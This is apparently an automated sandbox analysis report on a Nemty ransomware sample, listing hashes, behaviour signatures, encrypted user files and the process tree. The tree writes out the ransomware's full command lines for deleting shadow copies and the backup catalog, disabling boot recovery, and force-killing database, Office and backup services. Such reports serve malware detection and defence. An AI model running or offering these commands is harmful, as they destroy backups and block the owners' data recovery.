Analysis
- max time kernel: 121s
- max time network: 163s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 26-07-2021 12:41
Static task: static1
Behavioral task: behavioral1
  Sample: a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  Resource: win10v20210410
General
- Target: a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
- Size: 207KB
- MD5: ae24eb430be3d0598b7510bba484f580
- SHA1: 9b6a75b930e8ea41578ec0a6d3df2259a6990d1d
- SHA256: a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07
- SHA512: ca5ec7ca780642bc0105a84c7f4eea60b826d36429ecdceb2a9bb27f2ce688909a6953d18bd9884b19a36604a8c170876c6997c743ca3dbe44ecdfd4a142042a
Malware Config
Signatures
- Nemty
  Ransomware discovered in late 2019 which has been actively developed/updated over time.
- suricata: ET MALWARE Win32/Nemty Ransomware Style Geo IP Check M1
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies extensions of user files (14 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes:
  description | ioc | process
  File opened for modification | C:\Users\Admin\Pictures\InitializeConvert.tiff | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File opened for modification | C:\Users\Admin\Pictures\ReadRegister.tiff | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\SwitchRestart.tif => C:\Users\Admin\Pictures\SwitchRestart.tif.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\TraceStop.raw => C:\Users\Admin\Pictures\TraceStop.raw.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\GetFind.png => C:\Users\Admin\Pictures\GetFind.png.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\GrantFind.png => C:\Users\Admin\Pictures\GrantFind.png.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\RenameTest.raw => C:\Users\Admin\Pictures\RenameTest.raw.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\RepairSearch.crw => C:\Users\Admin\Pictures\RepairSearch.crw.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\SyncOpen.png => C:\Users\Admin\Pictures\SyncOpen.png.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\OutInitialize.crw => C:\Users\Admin\Pictures\OutInitialize.crw.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\InitializeConvert.tiff => C:\Users\Admin\Pictures\InitializeConvert.tiff.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\ReadRegister.tiff => C:\Users\Admin\Pictures\ReadRegister.tiff.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\ResumeSync.crw => C:\Users\Admin\Pictures\ResumeSync.crw.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  File renamed | C:\Users\Admin\Pictures\WatchHide.tif => C:\Users\Admin\Pictures\WatchHide.tif.NEMTY_LTM73P4 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
  flow | ioc
  14 | api.db-ip.com
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Interacts with shadow copies (2 TTPs, 3 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
  pid | process
  1752 | vssadmin.exe
  308 | vssadmin.exe
  2608 | vssadmin.exe
- Kills process with taskkill (14 IoCs)
  Processes:
  pid | process
  916 | taskkill.exe
  1968 | taskkill.exe
  1384 | taskkill.exe
  2088 | taskkill.exe
  796 | taskkill.exe
  984 | taskkill.exe
  2056 | taskkill.exe
  1016 | taskkill.exe
  2096 | taskkill.exe
  748 | taskkill.exe
  1524 | taskkill.exe
  2068 | taskkill.exe
  2076 | taskkill.exe
  1668 | taskkill.exe
- Modifies system certificate store
  Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 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 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 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 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious use of AdjustPrivilegeToken (57 IoCs)
  Processes:
  description | pid | process
  Token: SeBackupPrivilege | 1204 | vssvc.exe
  Token: SeRestorePrivilege | 1204 | vssvc.exe
  Token: SeAuditPrivilege | 1204 | vssvc.exe
  Token: SeDebugPrivilege | 1668 | taskkill.exe
  Token: SeDebugPrivilege | 1968 | taskkill.exe
  Token: SeDebugPrivilege | 796 | taskkill.exe
  Token: SeDebugPrivilege | 2056 | taskkill.exe
  Token: SeDebugPrivilege | 2088 | taskkill.exe
  Token: SeDebugPrivilege | 2096 | taskkill.exe
  Token: SeDebugPrivilege | 916 | taskkill.exe
  Token: SeDebugPrivilege | 1384 | taskkill.exe
  Token: SeDebugPrivilege | 1016 | taskkill.exe
  Token: SeDebugPrivilege | 748 | taskkill.exe
  Token: SeDebugPrivilege | 1524 | taskkill.exe
  Token: SeDebugPrivilege | 984 | taskkill.exe
  Token: SeDebugPrivilege | 2068 | taskkill.exe
  Token: SeDebugPrivilege | 2076 | taskkill.exe
  Token: SeIncreaseQuotaPrivilege | 1616 | WMIC.exe
  Token: SeSecurityPrivilege | 1616 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 1616 | WMIC.exe
  Token: SeLoadDriverPrivilege | 1616 | WMIC.exe
  Token: SeSystemProfilePrivilege | 1616 | WMIC.exe
  Token: SeSystemtimePrivilege | 1616 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 1616 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 1616 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 1616 | WMIC.exe
  Token: SeBackupPrivilege | 1616 | WMIC.exe
  Token: SeRestorePrivilege | 1616 | WMIC.exe
  Token: SeShutdownPrivilege | 1616 | WMIC.exe
  Token: SeDebugPrivilege | 1616 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 1616 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 1616 | WMIC.exe
  Token: SeUndockPrivilege | 1616 | WMIC.exe
  Token: SeManageVolumePrivilege | 1616 | WMIC.exe
  Token: 33 | 1616 | WMIC.exe
  Token: 34 | 1616 | WMIC.exe
  Token: 35 | 1616 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 1616 | WMIC.exe
  Token: SeSecurityPrivilege | 1616 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 1616 | WMIC.exe
  Token: SeLoadDriverPrivilege | 1616 | WMIC.exe
  Token: SeSystemProfilePrivilege | 1616 | WMIC.exe
  Token: SeSystemtimePrivilege | 1616 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 1616 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 1616 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 1616 | WMIC.exe
  Token: SeBackupPrivilege | 1616 | WMIC.exe
  Token: SeRestorePrivilege | 1616 | WMIC.exe
  Token: SeShutdownPrivilege | 1616 | WMIC.exe
  Token: SeDebugPrivilege | 1616 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 1616 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 1616 | WMIC.exe
  Token: SeUndockPrivilege | 1616 | WMIC.exe
  Token: SeManageVolumePrivilege | 1616 | WMIC.exe
  Token: 33 | 1616 | WMIC.exe
  Token: 34 | 1616 | WMIC.exe
  Token: 35 | 1616 | WMIC.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
  description | pid | process | target process
  PID 816 wrote to memory of 1632 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1632 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1632 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1632 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1520 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1520 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1520 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1520 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 1632 wrote to memory of 308 | 1632 | cmd.exe | vssadmin.exe
  PID 1632 wrote to memory of 308 | 1632 | cmd.exe | vssadmin.exe
  PID 1632 wrote to memory of 308 | 1632 | cmd.exe | vssadmin.exe
  PID 1632 wrote to memory of 308 | 1632 | cmd.exe | vssadmin.exe
  PID 1520 wrote to memory of 1752 | 1520 | cmd.exe | vssadmin.exe
  PID 1520 wrote to memory of 1752 | 1520 | cmd.exe | vssadmin.exe
  PID 1520 wrote to memory of 1752 | 1520 | cmd.exe | vssadmin.exe
  PID 1520 wrote to memory of 1752 | 1520 | cmd.exe | vssadmin.exe
  PID 816 wrote to memory of 1352 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1352 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1352 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1352 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1044 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1044 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1044 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1044 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1376 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1376 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1376 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1376 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 1044 wrote to memory of 748 | 1044 | cmd.exe | taskkill.exe
  PID 1044 wrote to memory of 748 | 1044 | cmd.exe | taskkill.exe
  PID 1044 wrote to memory of 748 | 1044 | cmd.exe | taskkill.exe
  PID 1044 wrote to memory of 748 | 1044 | cmd.exe | taskkill.exe
  PID 816 wrote to memory of 1372 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1372 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1372 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1372 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1880 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1880 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1880 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1880 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 1376 wrote to memory of 1668 | 1376 | cmd.exe | taskkill.exe
  PID 1376 wrote to memory of 1668 | 1376 | cmd.exe | taskkill.exe
  PID 1376 wrote to memory of 1668 | 1376 | cmd.exe | taskkill.exe
  PID 1376 wrote to memory of 1668 | 1376 | cmd.exe | taskkill.exe
  PID 1372 wrote to memory of 796 | 1372 | cmd.exe | taskkill.exe
  PID 1372 wrote to memory of 796 | 1372 | cmd.exe | taskkill.exe
  PID 1372 wrote to memory of 796 | 1372 | cmd.exe | taskkill.exe
  PID 1372 wrote to memory of 796 | 1372 | cmd.exe | taskkill.exe
  PID 1880 wrote to memory of 984 | 1880 | cmd.exe | taskkill.exe
  PID 1880 wrote to memory of 984 | 1880 | cmd.exe | taskkill.exe
  PID 1880 wrote to memory of 984 | 1880 | cmd.exe | taskkill.exe
  PID 1880 wrote to memory of 984 | 1880 | cmd.exe | taskkill.exe
  PID 816 wrote to memory of 1012 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1012 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1012 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1012 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1752 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1752 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1752 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 1752 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 996 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 996 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 996 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
  PID 816 wrote to memory of 996 | 816 | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe | cmd.exe
Processes (process tree; indentation shows parent/child depth)
- C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe"
  signatures: Modifies extensions of user files; Modifies system certificate store; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\vssadmin.exe
      command line: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
      signatures: Interacts with shadow copies
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\vssadmin.exe
      command line: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      signatures: Interacts with shadow copies
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im sql.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.*
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im winword.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im wordpad.*
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im wordpad.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im outlook.*
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im outlook.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im thunderbird.*
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im thunderbird.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im oracle.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im oracle.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im excel.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im onenote.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im onenote.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im virtualboxvm.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im virtualboxvm.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im node.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im node.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im QBW32.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im QBW32.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im WBGX.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im WBGX.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im Teams.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im Teams.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c taskkill /f /im Flow.*
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im Flow.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop DbxSvc
    - C:\Windows\SysWOW64\net.exe
      command line: net stop DbxSvc
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop DbxSvc
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop OracleXETNSListener
    - C:\Windows\SysWOW64\net.exe
      command line: net stop OracleXETNSListener
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop OracleXETNSListener
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop OracleServiceXE
    - C:\Windows\SysWOW64\net.exe
      command line: net stop OracleServiceXE
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop OracleServiceXE
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop AcrSch2Svc
    - C:\Windows\SysWOW64\net.exe
      command line: net stop AcrSch2Svc
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop AcrSch2Svc
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop AcronisAgent
    - C:\Windows\SysWOW64\net.exe
      command line: net stop AcronisAgent
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop AcronisAgent
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop Apache2.4
    - C:\Windows\SysWOW64\net.exe
      command line: net stop Apache2.4
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop Apache2.4
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop SQLWriter
    - C:\Windows\SysWOW64\net.exe
      command line: net stop SQLWriter
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop SQLWriter
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS
    - C:\Windows\SysWOW64\net.exe
      command line: net stop MSSQL$SQLEXPRESS
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop MSSQLServerADHelper100
    - C:\Windows\SysWOW64\net.exe
      command line: net stop MSSQLServerADHelper100
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop MSSQLServerADHelper100
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop MongoDB
    - C:\Windows\SysWOW64\net.exe
      command line: net stop MongoDB
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop MongoDB
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop SQLAgent$SQLEXPRESS
    - C:\Windows\SysWOW64\net.exe
      command line: net stop SQLAgent$SQLEXPRESS
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop SQLBrowser
    - C:\Windows\SysWOW64\net.exe
      command line: net stop SQLBrowser
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop SQLBrowser
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop CobianBackup11
    - C:\Windows\SysWOW64\net.exe
      command line: net stop CobianBackup11
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop CobianBackup11
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop cbVSCService11
    - C:\Windows\SysWOW64\net.exe
      command line: net stop cbVSCService11
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop cbVSCService11
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop QBCFMontorService
    - C:\Windows\SysWOW64\net.exe
      command line: net stop QBCFMontorService
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop QBVSS
    - C:\Windows\SysWOW64\net.exe
      command line: net stop QBVSS
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop QBVSS
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop
    - C:\Windows\SysWOW64\net.exe
      command line: net stop
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop
    - C:\Windows\SysWOW64\net.exe
      command line: net stop
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop
    - C:\Windows\SysWOW64\net.exe
      command line: net stop
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop
    - C:\Windows\SysWOW64\net.exe
      command line: net stop
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop
    - C:\Windows\SysWOW64\net.exe
      command line: net stop
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c net stop
    - C:\Windows\SysWOW64\net.exe
      command line: net stop
      - C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete
    - C:\Windows\SysWOW64\vssadmin.exe
      command line: vssadmin.exe delete shadows /all /quiet
      signatures: Interacts with shadow copies
    - C:\Windows\SysWOW64\Wbem\WMIC.exe
      command line: wmic shadowcopy delete
      signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
